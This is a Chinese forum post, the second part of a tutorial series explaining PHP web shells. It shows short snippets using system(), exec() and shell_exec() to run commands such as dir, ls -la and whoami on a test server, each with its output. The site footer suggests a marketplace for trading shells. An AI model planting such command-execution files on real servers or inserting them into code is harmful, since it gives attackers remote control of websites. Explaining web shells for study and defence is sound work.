请选择 进入手机版 | 继续访问电脑版

默认
回复 0

140

主题

145

帖子

442

积分

中级会员

Rank: 3Rank: 3

积分
442
QQ
Web Shell Part 2-1 使用PHP的Web-Shell101[复制链接]
发表于 2018-6-14 06:04:23 | 显示全部楼层 |阅读模式
本帖最后由 Grey 于 2018-6-14 08:29 编辑

在本系列的第1部分中,我们研究了web-shell是什么以及攻击者为什么会尝试使用它。在本系列的第2部分中,我们将看看PHP编程语言中的一些web-shell的具体示例。

几乎所有可以想到的Web编程语言都存在Web外壳。我们选择专注于PHP,因为它是网络上使用最广泛的编程语言。
PHP web shell只是使用内置的PHP函数来执行命令。以下是用于在PHP中执行shell命令的一些最常用函数。
注意 - 为了本文的目的,我们编辑了我们的主机文件并将域名www.example.com指向了测试服务器。
system()
该system()函数接受该命令作为参数并输出结果。
以下Microsoft Windows计算机上的示例将运行该dir命令以返回执行PHP文件的目录的目录列表。
<?php// Return the directory listing in which the file run (Windows)system("dir");?>--> Volume in drive C has no label.Volume Serial Number is A08E-9C63Directory of C:\webserver\www\demo04/27/2016 10:21 PM <DIR> .04/27/2016 10:21 PM <DIR> ..04/27/2016 10:19 PM 22 shell.php1 File(s) 22 bytes2 Dir(s) 31,977,467,904 bytes free
同样,ls在Linux机器上执行该命令也可以获得类似的结果。
<?php// Return the directory listing in which the file run (Linux)system("ls -la");?>--> total 12drwxrwxr-x 2 secuser secuser 4096 Apr 27 20:43 .drwxr-xr-x 6 secuser secuser 4096 Apr 27 20:40 ..-rw-rw-r-- 1 secuser secuser 26 Apr 27 20:41 shell.php
其他命令具有相同的效果。
<?php// Return the user the script is running undersystem(“whoami“);?>--> www-data
exec()
该exec()函数接受一个命令作为参数,但不输出结果。如果指定了第二个可选参数,则结果将作为数组返回。否则,只有回显结果的最后一行才会显示。
<?php// Executes, but returns nothingexec("ls -la");?>-->
echo与exec()函数一起使用,将只打印命令输出的最后一行。
<?php// Executes, returns only last line of the outputecho exec("ls -la");?>--> -rw-rw-r-- 1 secuser secuser 29 Apr 27 20:49 shell.php
如果指定了第二个参数,则结果将返回到数组中。
<?php// Executes, returns the output in an arrayexec("ls -la",$array);print_r($array);?>--> Array([0] => total 12[1] => drwxrwxr-x 2 secuser secuser 4096 Apr 27 20:55 .[2] => drwxr-xr-x 6 secuser secuser 4096 Apr 27 20:40 ..[3] => -rw-rw-r-- 1 secuser secuser 49 Apr 27 20:54 shell.php )

shell_exec()shell_exec()函数类似于exec(),但是,它将输出整个结果作为字符串。
<?php// Executes, returns the entire output as a stringecho shell_exec(“ls -la“);?>
--> total 12 drwxrwxr-x 2 secuser secuser 4096 Apr 28 18:24 . drwxr-xr-x 6 secuser secuser 4096 Apr 27 20:40 .. -rw-rw-r-- 1 secuser secuser 36 Apr 28 18:24 shell.php





本帖子中包含更多资源

您需要 登录 才可以下载或查看,没有帐号?立即注册

x
回复

使用道具 举报

您需要登录后才可以回帖 登录 | 立即注册

本版积分规则


QQArchiver 手机版 小黑屋  

免责声明:网站所有帖子,内容均为网友提供,不代表本社区立场! , Processed in 0.187632 second(s), 29 queries .

Powered by Discuz! X3.2

Copyright © 2015 ~ 2018 maishell交易网 保留所有权利!

返回顶部